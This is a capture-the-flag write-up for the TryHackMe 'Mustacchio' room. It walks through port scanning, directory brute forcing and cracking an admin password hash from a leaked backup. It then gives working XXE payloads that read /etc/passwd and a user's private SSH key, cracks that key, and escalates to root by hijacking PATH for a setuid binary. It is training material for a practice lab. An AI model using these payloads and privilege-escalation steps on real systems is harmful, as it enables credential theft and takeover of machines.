Jun 13, 2021
Mustacchio — TryHackMe
Easy boot2root Machine
Summary
Another easy boot2root room. We first needed to enumerate a bit to find out what is running and then doing directory Brute forcing to find a sqlite3 db dump, which gave us the admin password.Then using that password we logged in to the admin portal where there was a XXE vulnerability which was exploited to give us the user’s SSH encrypted key which was cracked with ssh2john. Privesc involved exploiting a suid binary.
This room is available here: https://tryhackme.com/room/mustacchio
So as usual let’s start enumerating the machine with nmap:
NMAP
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.202.187
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8765/tcp open ultraseek-https# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,8765 10.10.202.187
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
| 256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_ 256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | LoginSo, we have SSH port open and 2 web server ports open. Let’s use FFUF to check if any useful directory is exposed:
FFUF
# Perform directory brute forcing using ffuf
⇒ ffuf -u http://10.10.202.187/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/v1.3.1 Kali Exclusive <3
________________________________________________:: Method : GET
:: URL : http://10.10.202.187/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________custom [Status: 301, Size: 315, Words: 20, Lines: 10]
images [Status: 301, Size: 315, Words: 20, Lines: 10]
fonts [Status: 301, Size: 314, Words: 20, Lines: 10]
[Status: 200, Size: 1752, Words: 77, Lines: 73]
server-status [Status: 403, Size: 278, Words: 20, Lines: 10]
:: Progress: [220546/220546] :: Job [1/1] :: 1957 req/sec :: Duration: [0:02:17] :: Errors: 0 ::
We can see a directory called “custom” is there. Let’s explore it:
Users.bak
Users.bak looks to be a database dump:
Explore it using sqlitebroswer and it gives us a user ‘admin’ and a hashed password:
The hash is easily cracked at https://crackstation.net/ :
Admin Portal
There was one more web port open which nmap had told use earlier. Accessing that at port 8765 gives us a admin login portal:
Using the admin user and password found above, we are able to login. Also just clicking the submit button gives us a pop up — Insert XML code!
Also capture this request in Burp Suite:
Few things are revealed here:
- xml as a param — Indicating an XML is expected as input
- Code that explained why we got the pop-up
- May be an example XML at http://10.10.215.141:8765/auth/dontforget.bak
- User Barry and it have SSH key
Checking auth/dontforget.bak indeed gave us a n example XML request:
kali@kali:~$ cat /tmp/dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space....</com>
</comment>From this it is pretty clear now that we have XXE vulnerability here and we need to exploit it to get out first flag.
XXE Payload
Found some useful XXE payloads here :
Combining the XML request and the payloads, here is a POC which gave us the password file:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<comment>
<name>&ent;</name>
<author>Barry Clad</author>
<com>Hiiii</com>
</comment>
So we can use this POC to read the user Barry’s Private SSH key:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///home/barry/.ssh/id_rsa"> ]>
<comment>
<name>&ent;</name>
<author>Barry Clad</author>
<com>Hiiii</com>
</comment>We got the private key for the user Barry but the key is encrypted. Let’s use ssh2john and john to decrypt the key:
python /opt/tools/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
User Flag
So we now have the SSH key for user Barry along with the passphrase for that SSH key. Change the permission to the SSH keys to 600 and then login using the following command:
User.txt was in the user Barry’s home dir:
Privilege Escalation
Running Linux Smart Enumeration Script we found an uncommon setuid binary:
This is that binary with setuid bit set and it is owned by root :
Let’s analyze this binary using strings :
This binary looks to be Ngnix log reader. It is using tail command to read access.log but without the full path. We can exploit that and put in our own “tail” binary and use it to do privilege escalation. First we need to change the PATH variable, so that our binary is executed first:
barry@mustacchio:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:~$ PATH=/home/barry:$PATH
barry@mustacchio:~$ echo $PATH
/home/barry:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binThen let’s make a new file in /home/barry named tail :
barry@mustacchio:~$ cat tail
/bin/bash
barry@mustacchio:~$ chmod +x tail
barry@mustacchio:~$Now execute the suid binary /home/joe/live_log :
/bin/bash was executed as root and we got the root shell and then the root flag. Game over!
That’s it for this room. Thanks for reading.
